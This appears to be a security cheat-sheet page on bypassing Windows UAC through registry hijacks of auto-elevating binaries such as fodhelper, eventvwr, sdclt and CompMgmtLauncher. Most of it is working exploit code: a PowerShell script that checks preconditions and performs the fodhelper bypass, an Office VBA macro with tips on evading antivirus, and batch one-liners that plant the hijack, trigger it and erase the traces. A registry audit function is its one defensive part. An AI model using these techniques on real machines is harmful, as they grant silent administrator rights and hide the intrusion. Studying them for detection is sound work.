UAC Bypass

Vulnerable programs

Every binary below is Microsoft-signed and marked autoElevate in its manifest, so when UAC is at its default level Windows starts it with the full administrator token and no consent prompt. Each one then resolves a shell handler or application path from the per-user hive (HKCU), which the medium-integrity process can write freely; per-user HKCU\Software\Classes entries take precedence over the machine-wide HKLM ones in HKCR, so the planted command runs elevated. Preconditions for all of them: the current user is a member of the local Administrators group, UAC is enabled, and the prompt level is the default ("Notify me only when apps try to make changes"), not "Always notify".

CompMgmtLauncher.exe

  • Windows 7/8/10 (Windows 10 builds before 1703)
  • HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command = "cmd.exe" (same mscfile handler as eventvwr.exe; the launcher opens compmgmt.msc)

eventvwr.exe

  • Windows 7/8/10 (Windows 10 builds before 1703)
  • HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command = "cmd.exe"

sdclt.exe

  • Windows 10 (builds before 1709)
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe = "cmd.exe" (sdclt.exe launches control.exe and looks it up under the per-user App Paths key first)

fodhelper.exe

  • Windows 10
  • HKCU\Software\Classes\ms-settings\shell\open\command: create an empty REG_SZ value named "DelegateExecute" (with it present and empty the shell falls back to the command string instead of a COM handler)
  • HKCU\Software\Classes\ms-settings\shell\open\command (Default) = "cmd.exe" (fodhelper.exe opens the ms-settings: protocol, so this handler runs elevated)
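The three recipes above are the same trick against three handlers, so a PowerShell version that first checks the UAC preconditions, then runs the fodhelper variant with cleanup in a finally block, and finally audits HKCU for leftover hijack keys is worth having. This is an added example, not code from the original page or from the gists credited below; the function names are this example's own, and it assumes Windows 10 with Windows PowerShell 5.1, a user in the local Administrators group and the default UAC level.

```powershell
# Added example, not from the original page. Function names are this example's own.
# Assumes Windows 10, Windows PowerShell 5.1, a user in the local Administrators
# group, and the default UAC level (ConsentPromptBehaviorAdmin = 5).

function Test-UacBypassPreconditions {
    # Auto-elevate bypasses need a split (filtered) admin token and a UAC level
    # that lets Windows-signed autoElevate binaries start without a prompt.
    $pol = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $id  = [Security.Principal.WindowsIdentity]::GetCurrent()
    # S-1-5-32-544 is BUILTIN\Administrators; it is listed (deny-only) even in the filtered token
    $inAdmins   = [bool]($id.Groups | Where-Object { $_.Value -eq 'S-1-5-32-544' })
    # IsInRole ignores deny-only SIDs, so this is $true only in an already elevated process
    $isElevated = ([Security.Principal.WindowsPrincipal]$id).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)
    # ConsentPromptBehaviorAdmin: 5 = default slider, 0 = never notify, 2 = always notify.
    # Only 5 (and trivially 0) let autoElevate binaries skip the consent dialog.
    $level = [int]$pol.ConsentPromptBehaviorAdmin
    [pscustomobject]@{
        EnableLUA                  = [int]$pol.EnableLUA
        ConsentPromptBehaviorAdmin = $level
        InAdministratorsGroup      = $inAdmins
        AlreadyElevated            = $isElevated
        Exploitable                = ($pol.EnableLUA -eq 1) -and $inAdmins -and
                                     (-not $isElevated) -and ($level -in 0, 5)
    }
}

function Invoke-FodhelperBypass {
    param([string]$Command = 'cmd.exe')   # runs with the admin token
    $key = 'HKCU:\Software\Classes\ms-settings\shell\open\command'
    try {
        New-Item -Path $key -Force | Out-Null
        # Empty DelegateExecute makes the shell use the command string, not a COM handler
        New-ItemProperty -Path $key -Name 'DelegateExecute' -Value '' -PropertyType String -Force | Out-Null
        Set-ItemProperty -Path $key -Name '(Default)' -Value $Command
        # fodhelper.exe auto-elevates and opens ms-settings:, i.e. our hijacked handler
        $p = Start-Process -FilePath "$env:windir\System32\fodhelper.exe" -PassThru
        $p.WaitForExit(10000) | Out-Null
        Start-Sleep -Seconds 2   # let the handler spawn before the key disappears
    } finally {
        # Always remove the hijack so neither an artefact nor a dangling handler remains
        Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force -ErrorAction SilentlyContinue
    }
}

function Get-UacHijackKeys {
    # Audit HKCU for the handler keys the bypasses on this page create.
    # None of them exists in a clean profile, so any hit deserves a look.
    $paths = @(
        'HKCU:\Software\Classes\mscfile\shell\open\command',                     # eventvwr / CompMgmtLauncher
        'HKCU:\Software\Classes\ms-settings\shell\open\command',                 # fodhelper
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe'  # sdclt
    )
    foreach ($p in $paths) {
        if (Test-Path -Path $p) {
            $props = Get-ItemProperty -Path $p
            [pscustomobject]@{
                Key         = $p
                Default     = $props.'(default)'
                HasDelegate = $null -ne $props.PSObject.Properties['DelegateExecute']
            }
        }
    }
}

# Usage:
#   Test-UacBypassPreconditions              # confirm Exploitable is $true first
#   Invoke-FodhelperBypass -Command 'cmd.exe'
#   Get-UacHijackKeys                        # returns nothing once cleanup has run
```

Run the precondition check before anything else: on "Always notify" (ConsentPromptBehaviorAdmin = 2) fodhelper.exe prompts like any other binary and the technique simply fails, and from a non-admin account there is no admin token to unlock in the first place. The audit function doubles as a quick host check for defenders, since these keys are created under HKCU and are usually deleted seconds later by the same script that planted them.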

Examples

WScript Example (VBA macro driving the eventvwr.exe bypass through the WScript.Shell COM object)
' Credits to https://gist.github.com/dxflatline/6e399ea1fef59456d7ed82909f3bd506
' The Sleep import is flagged by some AV engines (a ping-based delay is an alternative)
' Obfuscation may be needed
' PtrSafe is required on 64-bit Office; dwMilliseconds stays Long because DWORD is 32-bit
#If VBA7 Then
Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#Else
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If
Private Sub CommandButton1_Click()
   Dim WSobj As Object
   Set WSobj = CreateObject("WScript.Shell")
   ' A trailing backslash addresses the key's (Default) value; the first write creates the key path
   WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", ""
   WSobj.RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "C:\windows\system32\cmd.exe", "REG_SZ"
   ' eventvwr.exe auto-elevates and launches the mscfile handler, here cmd.exe, with the admin token
   WSobj.Run ("C:\Windows\System32\eventvwr.exe")
   Sleep 2000
   ' Clean up bottom-up: RegDelete removes one key at a time and needs the child keys gone first
   WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"
   WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\open\"
   WSobj.RegDelete "HKCU\Software\Classes\mscfile\shell\"
   WSobj.RegDelete "HKCU\Software\Classes\mscfile\"
End Sub

Source: uac-bypass.vbs

Batch Example
REM Credits to https://gist.github.com/xillwillx/39e5cccc846d5b5a475bbad48216a5a7
REM Each one-liner plants the handler in HKCU, runs the auto-elevating binary, waits for it
REM to exit (START /W) and then removes the key so no artefact is left behind.

REM UAC bypass for Win10 (sdclt.exe via the per-user App Paths\control.exe entry):
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

REM UAC bypass for Win10 (fodhelper.exe via the ms-settings handler; an empty DelegateExecute value plus the (Default) command):
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f

REM UAC bypass for 7/8/10 (CompMgmtLauncher.exe via the mscfile handler; eventvwr.exe works the same way):
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f

Source: uac-bypass.bat